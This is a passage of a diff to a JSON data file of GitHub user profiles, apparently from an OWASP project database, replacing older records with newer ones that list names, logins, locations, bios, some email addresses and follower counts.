"China,GZ,GD", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 328, + "public_gists_count": 5, + "public_repositories_count": 68, + "created_at": "2013-08-18T23:49:13Z", + "updated_at": "2024-09-20T11:30:16Z", + "node_id": "MDQ6VXNlcjUyNTc1NTI=", + "bio": "Idea is cheap show me the code", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8130, + "fields": { + "nest_created_at": "2024-09-22T09:43:51.967Z", + "nest_updated_at": "2024-09-22T19:42:57.994Z", + "name": "Vincent Thelang", + "login": "vincent-the", + "email": "vincent@vincent-thelang.de", + "avatar_url": "https://avatars.githubusercontent.com/u/4801522?v=4", + "company": "", + "location": "Dresden, Germany", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2013-06-24T13:08:40Z", + "updated_at": "2024-09-18T11:23:47Z", + "node_id": "MDQ6VXNlcjQ4MDE1MjI=", + "bio": "Web-Developer", + "is_hireable": true, + "twitter_username": "VincentThelang" + } +}, +{ + "model": "github.user", + "pk": 8131, + "fields": { + "nest_created_at": "2024-09-22T09:43:55.589Z", + "nest_updated_at": "2024-09-22T09:43:55.589Z", + "name": "Mitchell Kelly", + "login": "MitchellKelly-AlphaSights", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7027407?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/103204694?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-03-21T23:46:14Z", - "updated_at": "2024-07-25T23:29:33Z", - "node_id": "MDQ6VXNlcjcwMjc0MDc=", + "public_repositories_count": 1, + "created_at": "2022-04-07T15:32:47Z", + "updated_at": "2023-11-13T16:15:24Z", + "node_id": "U_kgDOBibHVg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429603,24 +689202,24 @@ }, { "model": "github.user", - "pk": 2775, + "pk": 8132, "fields": { - "nest_created_at": "2024-09-12T02:21:12.074Z", - "nest_updated_at": "2024-09-18T19:08:56.758Z", - "name": "", - "login": "si076", + "nest_created_at": "2024-09-22T09:44:03.301Z", + "nest_updated_at": "2024-09-22T19:43:06.123Z", + "name": "Aashish Singh", + "login": "Aashish683", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107757981?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/30633088?v=4", "company": "", - "location": "", + "location": "BITS Pilani, Rajasthan.", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-06-18T13:06:41Z", - "updated_at": "2024-02-03T09:13:46Z", - "node_id": "U_kgDOBmxBnQ", + "following_count": 2, + "followers_count": 14, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2017-08-01T17:09:56Z", + "updated_at": "2023-05-28T09:50:56Z", + "node_id": "MDQ6VXNlcjMwNjMzMDg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429628,49 +689227,49 @@ }, { "model": "github.user", - "pk": 2776, + "pk": 8133, "fields": { - "nest_created_at": "2024-09-12T02:21:30.398Z", - "nest_updated_at": "2024-09-12T02:21:30.398Z", - "name": "", - "login": "marjanovicstefan", + "nest_created_at": "2024-09-22T09:44:03.634Z", + "nest_updated_at": "2024-09-22T19:43:06.428Z", + "name": "Marc Rüttler", + "login": "MarcRler", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73475725?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/18336861?v=4", "company": "", - "location": "", + "location": "Stuttgart", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2020-10-26T12:08:12Z", - "updated_at": "2023-06-02T11:57:08Z", - "node_id": "MDQ6VXNlcjczNDc1NzI1", - "bio": "", + "public_repositories_count": 14, + "created_at": "2016-04-07T20:41:29Z", + "updated_at": "2023-05-15T14:00:39Z", + "node_id": "MDQ6VXNlcjE4MzM2ODYx", + "bio": "Computer Science and Media Student @HdM_Stuttgart", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2777, + "pk": 8134, "fields": { - "nest_created_at": "2024-09-12T02:21:31.200Z", - "nest_updated_at": "2024-09-12T02:21:31.200Z", - "name": "", - "login": "naftolib", + "nest_created_at": "2024-09-22T09:44:03.973Z", + "nest_updated_at": "2024-09-22T19:43:06.745Z", + "name": "Arpit Agrawal", + "login": "agrawalarpit14", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17856481?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/35000671?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 22, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-03-15T16:53:00Z", - "updated_at": "2023-05-11T13:13:56Z", - "node_id": "MDQ6VXNlcjE3ODU2NDgx", + "public_repositories_count": 20, + "created_at": "2018-01-01T11:56:27Z", + "updated_at": "2022-09-29T17:39:15Z", + "node_id": "MDQ6VXNlcjM1MDAwNjcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429678,74 +689277,124 @@ }, { "model": "github.user", - "pk": 2778, + "pk": 8135, "fields": { - "nest_created_at": "2024-09-12T02:21:32.844Z", - "nest_updated_at": "2024-09-12T02:21:32.844Z", - "name": "Maarten Lemmens", - "login": "mlemmens", + "nest_created_at": "2024-09-22T09:44:04.285Z", + "nest_updated_at": "2024-09-22T19:43:07.067Z", + "name": "SC4R", + "login": "Scar26", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15130187?v=4", - "company": "@elevennl", - "location": "The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/41830515?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 17, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2015-10-14T18:58:17Z", - "updated_at": "2024-07-25T09:33:50Z", - "node_id": "MDQ6VXNlcjE1MTMwMTg3", - "bio": "", + "following_count": 1, + "followers_count": 106, + "public_gists_count": 7, + "public_repositories_count": 41, + "created_at": "2018-07-28T13:09:54Z", + "updated_at": "2024-01-09T10:54:51Z", + "node_id": "MDQ6VXNlcjQxODMwNTE1", + "bio": "Cryptography | Security | Math", "is_hireable": false, - "twitter_username": "" + "twitter_username": "AnonBlueWhale" } }, { "model": "github.user", - "pk": 2779, + "pk": 8136, "fields": { - "nest_created_at": "2024-09-12T02:21:33.691Z", - "nest_updated_at": "2024-09-12T02:21:33.691Z", - "name": "Adrian Floarea", - "login": "afloarea", + "nest_created_at": "2024-09-22T09:44:05.246Z", + "nest_updated_at": "2024-09-22T19:43:08.016Z", + "name": "Shoeb Patel", + "login": "CaptainFreak", + "email": "patelshoeb4@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20478531?v=4", + "company": "Amazon Web Services (AWS)", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 188, + "followers_count": 190, + "public_gists_count": 8, + "public_repositories_count": 61, + "created_at": "2016-07-15T14:50:56Z", + "updated_at": "2024-09-13T13:10:38Z", + "node_id": "MDQ6VXNlcjIwNDc4NTMx", + "bio": "Hacker", + "is_hireable": true, + "twitter_username": "0xCaptainFreak" + } +}, +{ + "model": "github.user", + "pk": 8137, + "fields": { + "nest_created_at": "2024-09-22T09:44:05.565Z", + "nest_updated_at": "2024-09-22T19:43:08.325Z", + "name": "Supratik Das", + "login": "supra08", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20104805?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/30755453?v=4", + "company": "@dashwave", + "location": "Bangalore, India", + "collaborators_count": 0, + "following_count": 49, + "followers_count": 94, + "public_gists_count": 3, + "public_repositories_count": 63, + "created_at": "2017-08-05T17:22:32Z", + "updated_at": "2024-08-30T20:30:22Z", + "node_id": "MDQ6VXNlcjMwNzU1NDUz", + "bio": "Supervillain in disguise", + "is_hireable": true, + "twitter_username": "supradeux" + } +}, +{ + "model": "github.user", + "pk": 8138, + "fields": { + "nest_created_at": "2024-09-22T09:44:05.874Z", + "nest_updated_at": "2024-09-22T19:43:08.641Z", + "name": "Ayas Behera", + "login": "the-pro", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42973786?v=4", + "company": "Gameskraft", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2016-06-23T06:56:58Z", - "updated_at": "2024-09-04T11:45:16Z", - "node_id": "MDQ6VXNlcjIwMTA0ODA1", - "bio": "", + "following_count": 13, + "followers_count": 15, + "public_gists_count": 2, + "public_repositories_count": 24, + "created_at": "2018-09-04T15:32:12Z", + "updated_at": "2024-09-18T12:33:06Z", + "node_id": "MDQ6VXNlcjQyOTczNzg2", + "bio": "Software Engineer @ Gameskraft | GSoC 21 @OWASP ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ayasbehera" } }, { "model": "github.user", - "pk": 2780, + "pk": 8139, "fields": { - "nest_created_at": "2024-09-12T02:21:34.577Z", - "nest_updated_at": "2024-09-12T02:21:34.577Z", - "name": "", - "login": "janikgithub", + "nest_created_at": "2024-09-22T09:44:06.183Z", + "nest_updated_at": "2024-09-22T19:43:08.948Z", + "name": "Ziyang", + "login": "paseaf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11970648?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/33207565?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-04-16T01:43:46Z", - "updated_at": "2024-07-26T00:15:28Z", - "node_id": "MDQ6VXNlcjExOTcwNjQ4", + "public_gists_count": 9, + "public_repositories_count": 18, + "created_at": "2017-10-29T23:09:09Z", + "updated_at": "2024-09-06T05:50:47Z", + "node_id": "MDQ6VXNlcjMzMjA3NTY1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429753,49 +689402,49 @@ }, { "model": "github.user", - "pk": 2781, + "pk": 8140, "fields": { - "nest_created_at": "2024-09-12T02:21:35.845Z", - "nest_updated_at": "2024-09-12T02:21:35.845Z", - "name": "", - "login": "osobolev", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6529210?v=4", + "nest_created_at": "2024-09-22T09:44:07.124Z", + "nest_updated_at": "2024-09-22T19:43:09.892Z", + "name": "Rishabh Keshan", + "login": "rishabhkeshan", + "email": "rishabhkeshan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/58903797?v=4", "company": "", - "location": "", + "location": "Kolkata, West Bengal", "collaborators_count": 0, - "following_count": 0, - "followers_count": 27, - "public_gists_count": 6, - "public_repositories_count": 28, - "created_at": "2014-01-28T21:44:09Z", - "updated_at": "2024-04-29T12:13:34Z", - "node_id": "MDQ6VXNlcjY1MjkyMTA=", - "bio": "", + "following_count": 17, + "followers_count": 66, + "public_gists_count": 0, + "public_repositories_count": 56, + "created_at": "2019-12-15T09:40:46Z", + "updated_at": "2024-09-17T05:31:57Z", + "node_id": "MDQ6VXNlcjU4OTAzNzk3", + "bio": "GSoC'23 @juice-shop | Building @onboardingclub | @sorobix ", "is_hireable": false, - "twitter_username": "" + "twitter_username": "KeshanRishabh" } }, { "model": "github.user", - "pk": 2782, + "pk": 8141, "fields": { - "nest_created_at": "2024-09-12T02:21:36.657Z", - "nest_updated_at": "2024-09-18T19:09:01.080Z", - "name": "Eric Norman", - "login": "enapps-enorman", + "nest_created_at": "2024-09-22T09:44:07.454Z", + "nest_updated_at": "2024-09-22T19:43:10.202Z", + "name": "Aaryan Budhiraja", + "login": "aaryan01", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13108369?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/31697449?v=4", "company": "", - "location": "Kent, WA USA", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 21, + "followers_count": 11, "public_gists_count": 0, - "public_repositories_count": 46, - "created_at": "2015-06-29T20:29:47Z", - "updated_at": "2023-12-26T23:21:16Z", - "node_id": "MDQ6VXNlcjEzMTA4MzY5", + "public_repositories_count": 21, + "created_at": "2017-09-06T13:21:06Z", + "updated_at": "2024-03-03T19:50:14Z", + "node_id": "MDQ6VXNlcjMxNjk3NDQ5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429803,149 +689452,174 @@ }, { "model": "github.user", - "pk": 2783, + "pk": 8142, "fields": { - "nest_created_at": "2024-09-12T02:21:46.103Z", - "nest_updated_at": "2024-09-18T19:09:05.667Z", - "name": "Uku Sõrmus", - "login": "ukusormus", + "nest_created_at": "2024-09-22T09:44:07.766Z", + "nest_updated_at": "2024-09-22T19:43:10.511Z", + "name": "m4l1c3", + "login": "m4l1c3", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26545016?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5158588?v=4", + "company": "PlexTrac", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 2, + "followers_count": 8, "public_gists_count": 1, - "public_repositories_count": 5, - "created_at": "2017-03-20T13:08:54Z", - "updated_at": "2024-09-13T13:36:48Z", - "node_id": "MDQ6VXNlcjI2NTQ1MDE2", - "bio": "", + "public_repositories_count": 97, + "created_at": "2013-08-04T06:59:55Z", + "updated_at": "2024-09-13T11:59:47Z", + "node_id": "MDQ6VXNlcjUxNTg1ODg=", + "bio": "App Sec Engineer", "is_hireable": false, - "twitter_username": "" + "twitter_username": "the_m4l1c3" } }, { "model": "github.user", - "pk": 2784, + "pk": 8143, "fields": { - "nest_created_at": "2024-09-12T02:21:49.077Z", - "nest_updated_at": "2024-09-12T02:21:49.077Z", - "name": "Hu shan", - "login": "kmoonn", + "nest_created_at": "2024-09-22T09:44:08.432Z", + "nest_updated_at": "2024-09-22T19:43:11.152Z", + "name": "shantanu", + "login": "cigar-galaxy82", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103509070?v=4", - "company": "Wuhan University of Technology.", - "location": "Wuhan,Hubei,China.", + "avatar_url": "https://avatars.githubusercontent.com/u/56212958?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 12, + "following_count": 6, "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2022-04-12T12:31:46Z", - "updated_at": "2024-08-18T14:22:42Z", - "node_id": "U_kgDOBitsTg", - "bio": "A 22 years old Aries boy, From Mountain City Chongqing, who is interested in literature, programming, network security, etc.", + "public_repositories_count": 80, + "created_at": "2019-10-06T04:19:31Z", + "updated_at": "2024-08-16T08:43:33Z", + "node_id": "MDQ6VXNlcjU2MjEyOTU4", + "bio": "I build things", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2785, + "pk": 8144, "fields": { - "nest_created_at": "2024-09-12T02:21:50.754Z", - "nest_updated_at": "2024-09-12T02:21:50.754Z", - "name": "Siôn le Roux", - "login": "sionleroux", - "email": "sion@sionleroux.com", - "avatar_url": "https://avatars.githubusercontent.com/u/840466?v=4", - "company": "Adevinta Hungary", - "location": "Dunaharaszti, Hungary", + "nest_created_at": "2024-09-22T09:44:08.750Z", + "nest_updated_at": "2024-09-22T19:43:11.476Z", + "name": "Bogdan Mihai Nicolae", + "login": "bogminic", + "email": "bmnicolae@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10672395?v=4", + "company": "", + "location": "Brasov", "collaborators_count": 0, - "following_count": 81, - "followers_count": 51, - "public_gists_count": 19, + "following_count": 5, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2015-01-23T15:52:02Z", + "updated_at": "2024-09-16T11:31:55Z", + "node_id": "MDQ6VXNlcjEwNjcyMzk1", + "bio": "Software developer, educator and content creator", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8145, + "fields": { + "nest_created_at": "2024-09-22T09:44:09.395Z", + "nest_updated_at": "2024-09-22T19:43:12.097Z", + "name": "", + "login": "chinggg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24590067?v=4", + "company": "Max Planck Institute", + "location": "Germany", + "collaborators_count": 0, + "following_count": 213, + "followers_count": 126, + "public_gists_count": 5, "public_repositories_count": 58, - "created_at": "2011-06-09T17:18:49Z", - "updated_at": "2024-09-02T09:18:36Z", - "node_id": "MDQ6VXNlcjg0MDQ2Ng==", - "bio": "Born in Namibia 🇳🇦 Living in Hungary 🇭🇺 proud father 👨‍👧‍👦👩‍👧 I work as a software engineer 👨🏼‍💻 and I like 🍺 🎸 🧗🏼‍♂️ 🚵🏼‍♂️ ✝️!", + "created_at": "2016-12-15T14:44:32Z", + "updated_at": "2024-09-03T11:42:33Z", + "node_id": "MDQ6VXNlcjI0NTkwMDY3", + "bio": "CS PhD Student at UC Irvine,\r\n\r\nCurrently Visiting Max Planck Institute", "is_hireable": false, - "twitter_username": "sinisterstuf" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2786, + "pk": 8146, "fields": { - "nest_created_at": "2024-09-12T02:21:57.697Z", - "nest_updated_at": "2024-09-18T19:10:18.750Z", - "name": "OWASP SAMM", - "login": "owaspsamm", - "email": "info@owaspsamm.org", - "avatar_url": "https://avatars.githubusercontent.com/u/74980410?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:44:10.722Z", + "nest_updated_at": "2024-09-22T19:43:13.463Z", + "name": "Alejandro Saenz", + "login": "alejandrosaenz117", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1582016?v=4", + "company": "@Twilio @Segmentio", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 149, - "public_gists_count": 0, - "public_repositories_count": 19, - "created_at": "2020-11-24T16:43:39Z", - "updated_at": "2024-03-24T15:20:55Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjc0OTgwNDEw", - "bio": "The OWASP SAMM project", + "following_count": 40, + "followers_count": 31, + "public_gists_count": 2, + "public_repositories_count": 30, + "created_at": "2012-03-28T03:24:23Z", + "updated_at": "2024-09-02T11:22:16Z", + "node_id": "MDQ6VXNlcjE1ODIwMTY=", + "bio": "A Builder and Breaker of things @ Twilio", "is_hireable": false, - "twitter_username": "owaspsamm" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2787, + "pk": 8147, "fields": { - "nest_created_at": "2024-09-12T02:22:00.906Z", - "nest_updated_at": "2024-09-18T19:10:04.941Z", - "name": "", - "login": "maximbaele", + "nest_created_at": "2024-09-22T09:44:11.375Z", + "nest_updated_at": "2024-09-22T19:43:14.136Z", + "name": "Martin Rock-Evans", + "login": "rockydevnet", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8909779?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4063056?v=4", + "company": "UK Hydrographic Office", "location": "", "collaborators_count": 0, "following_count": 2, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2014-09-25T05:41:35Z", - "updated_at": "2024-06-24T20:42:59Z", - "node_id": "MDQ6VXNlcjg5MDk3Nzk=", - "bio": "", + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2013-04-04T20:57:57Z", + "updated_at": "2024-08-27T14:45:39Z", + "node_id": "MDQ6VXNlcjQwNjMwNTY=", + "bio": "Principal Software Engineer working in the South West of England.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2788, + "pk": 8148, "fields": { - "nest_created_at": "2024-09-12T02:22:10.600Z", - "nest_updated_at": "2024-09-12T02:22:12.293Z", - "name": "Munyaradzi Mufambisi", - "login": "mufambisi", - "email": "mufambisi@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29654800?v=4", + "nest_created_at": "2024-09-22T09:44:11.692Z", + "nest_updated_at": "2024-09-22T19:43:14.446Z", + "name": "Justin Smid", + "login": "justinsmid", + "email": "justin.smid@getmarvia.com", + "avatar_url": "https://avatars.githubusercontent.com/u/34271675?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2017-06-23T09:45:38Z", - "updated_at": "2024-08-26T02:53:55Z", - "node_id": "MDQ6VXNlcjI5NjU0ODAw", + "following_count": 2, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 22, + "created_at": "2017-12-05T11:29:18Z", + "updated_at": "2024-08-20T07:11:17Z", + "node_id": "MDQ6VXNlcjM0MjcxNjc1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429953,24 +689627,24 @@ }, { "model": "github.user", - "pk": 2789, + "pk": 8149, "fields": { - "nest_created_at": "2024-09-12T02:22:10.974Z", - "nest_updated_at": "2024-09-12T02:25:30.270Z", - "name": "Bart De Win", - "login": "23bartman", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5327361?v=4", + "nest_created_at": "2024-09-22T09:44:12.317Z", + "nest_updated_at": "2024-09-22T19:43:15.191Z", + "name": "Matteo Gheza", + "login": "MatteoGheza", + "email": "me@matteogheza.it", + "avatar_url": "https://avatars.githubusercontent.com/u/27729549?v=4", "company": "", - "location": "", + "location": "Brescia, Italy", "collaborators_count": 0, - "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2013-08-28T05:53:21Z", - "updated_at": "2024-08-25T14:21:20Z", - "node_id": "MDQ6VXNlcjUzMjczNjE=", + "following_count": 87, + "followers_count": 28, + "public_gists_count": 16, + "public_repositories_count": 29, + "created_at": "2017-04-18T12:54:28Z", + "updated_at": "2024-09-17T22:56:13Z", + "node_id": "MDQ6VXNlcjI3NzI5NTQ5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -429978,49 +689652,49 @@ }, { "model": "github.user", - "pk": 2790, + "pk": 8150, "fields": { - "nest_created_at": "2024-09-12T02:22:13.607Z", - "nest_updated_at": "2024-09-12T02:22:13.607Z", - "name": "", - "login": "derweiser", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36988247?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:44:12.946Z", + "nest_updated_at": "2024-09-22T19:43:15.813Z", + "name": "Imgbot", + "login": "ImgBotApp", + "email": "help@imgbot.net", + "avatar_url": "https://avatars.githubusercontent.com/u/31427850?v=4", + "company": "Imgbot", + "location": "Seattle", "collaborators_count": 0, - "following_count": 7, - "followers_count": 1, + "following_count": 1, + "followers_count": 1442, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2018-03-02T10:46:53Z", - "updated_at": "2023-02-08T15:47:02Z", - "node_id": "MDQ6VXNlcjM2OTg4MjQ3", - "bio": "", + "public_repositories_count": 354, + "created_at": "2017-08-29T02:46:40Z", + "updated_at": "2023-12-05T13:33:21Z", + "node_id": "MDQ6VXNlcjMxNDI3ODUw", + "bio": "I commit for Imgbot https://imgbot.net", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2791, + "pk": 8151, "fields": { - "nest_created_at": "2024-09-12T02:22:15.297Z", - "nest_updated_at": "2024-09-18T19:10:17.354Z", - "name": "", - "login": "Pat-Duarte", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41348252?v=4", + "nest_created_at": "2024-09-22T09:44:13.261Z", + "nest_updated_at": "2024-09-22T19:43:16.127Z", + "name": "Jacek", + "login": "GingerCatNL", + "email": "nl.gingercat@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20044927?v=4", "company": "", - "location": "", + "location": "Belgium", "collaborators_count": 0, - "following_count": 1, + "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-07-17T22:37:11Z", - "updated_at": "2024-09-03T18:57:18Z", - "node_id": "MDQ6VXNlcjQxMzQ4MjUy", + "public_repositories_count": 5, + "created_at": "2016-06-20T13:08:15Z", + "updated_at": "2024-05-21T13:09:42Z", + "node_id": "MDQ6VXNlcjIwMDQ0OTI3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430028,49 +689702,49 @@ }, { "model": "github.user", - "pk": 2792, + "pk": 8152, "fields": { - "nest_created_at": "2024-09-12T02:22:32.069Z", - "nest_updated_at": "2024-09-12T02:25:15.177Z", - "name": "John DiLeo", - "login": "johndileo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6581263?v=4", - "company": "OWASP", - "location": "", + "nest_created_at": "2024-09-22T09:44:13.979Z", + "nest_updated_at": "2024-09-22T19:43:16.747Z", + "name": "Madhur Wadhwa", + "login": "madhurw7", + "email": "madhurw7official@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8269209?v=4", + "company": "", + "location": "India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2014-02-04T04:17:19Z", - "updated_at": "2024-08-14T15:24:26Z", - "node_id": "MDQ6VXNlcjY1ODEyNjM=", - "bio": "", + "following_count": 47, + "followers_count": 30, + "public_gists_count": 13, + "public_repositories_count": 18, + "created_at": "2014-07-25T16:26:19Z", + "updated_at": "2024-04-10T02:33:58Z", + "node_id": "MDQ6VXNlcjgyNjkyMDk=", + "bio": "Enthusiast UI/UX Designer Developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2793, + "pk": 8153, "fields": { - "nest_created_at": "2024-09-12T02:22:40.277Z", - "nest_updated_at": "2024-09-12T02:25:01.121Z", - "name": "John K", - "login": "KGABSWEDEN", + "nest_created_at": "2024-09-22T09:44:14.291Z", + "nest_updated_at": "2024-09-22T19:43:17.092Z", + "name": "Matt Moses", + "login": "matt-moses", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50436829?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/8397647?v=4", "company": "", - "location": "Sweden", + "location": "Bentonville, AR", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-05-09T05:26:36Z", - "updated_at": "2022-10-11T15:20:27Z", - "node_id": "MDQ6VXNlcjUwNDM2ODI5", + "following_count": 4, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 124, + "created_at": "2014-08-08T19:00:15Z", + "updated_at": "2024-09-16T19:15:00Z", + "node_id": "MDQ6VXNlcjgzOTc2NDc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430078,49 +689752,49 @@ }, { "model": "github.user", - "pk": 2794, + "pk": 8154, "fields": { - "nest_created_at": "2024-09-12T02:22:42.718Z", - "nest_updated_at": "2024-09-12T02:25:09.819Z", - "name": "Daniel Kefer", - "login": "dkefer", + "nest_created_at": "2024-09-22T09:44:14.608Z", + "nest_updated_at": "2024-09-22T19:43:17.403Z", + "name": "Parth Nanda", + "login": "parthn2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13050398?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/74675085?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, + "following_count": 8, "followers_count": 8, - "public_gists_count": 2, - "public_repositories_count": 19, - "created_at": "2015-06-25T13:55:55Z", - "updated_at": "2024-07-18T12:24:22Z", - "node_id": "MDQ6VXNlcjEzMDUwMzk4", - "bio": "", + "public_gists_count": 1, + "public_repositories_count": 55, + "created_at": "2020-11-18T17:16:41Z", + "updated_at": "2024-09-01T12:17:43Z", + "node_id": "MDQ6VXNlcjc0Njc1MDg1", + "bio": "GSoC'23 -> OWASP @juice-shop ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2795, + "pk": 8155, "fields": { - "nest_created_at": "2024-09-12T02:22:59.181Z", - "nest_updated_at": "2024-09-13T16:53:15.284Z", + "nest_created_at": "2024-09-22T09:44:14.919Z", + "nest_updated_at": "2024-09-22T19:43:17.709Z", "name": "", - "login": "nessimk", + "login": "ricardoamarilla", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29360986?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/61243991?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 1, - "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 11, - "created_at": "2017-06-11T22:51:07Z", - "updated_at": "2022-11-05T14:36:41Z", - "node_id": "MDQ6VXNlcjI5MzYwOTg2", + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-02-19T16:42:30Z", + "updated_at": "2024-05-02T19:00:43Z", + "node_id": "MDQ6VXNlcjYxMjQzOTkx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -430128,74 +689802,99 @@ }, { "model": "github.user", - "pk": 2796, + "pk": 8156, "fields": { - "nest_created_at": "2024-09-12T02:23:29.177Z", - "nest_updated_at": "2024-09-12T02:23:29.177Z", - "name": "", - "login": "amedvedchuk", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10553379?v=4", - "company": "", + "nest_created_at": "2024-09-22T09:44:15.547Z", + "nest_updated_at": "2024-09-22T19:43:18.336Z", + "name": "beingPranjal", + "login": "PranjalAgni", + "email": "pranjal.agnihotri6@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/26196076?v=4", + "company": "Microsoft", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2015-01-15T21:52:16Z", - "updated_at": "2024-05-23T16:06:51Z", - "node_id": "MDQ6VXNlcjEwNTUzMzc5", - "bio": "", + "following_count": 40, + "followers_count": 63, + "public_gists_count": 27, + "public_repositories_count": 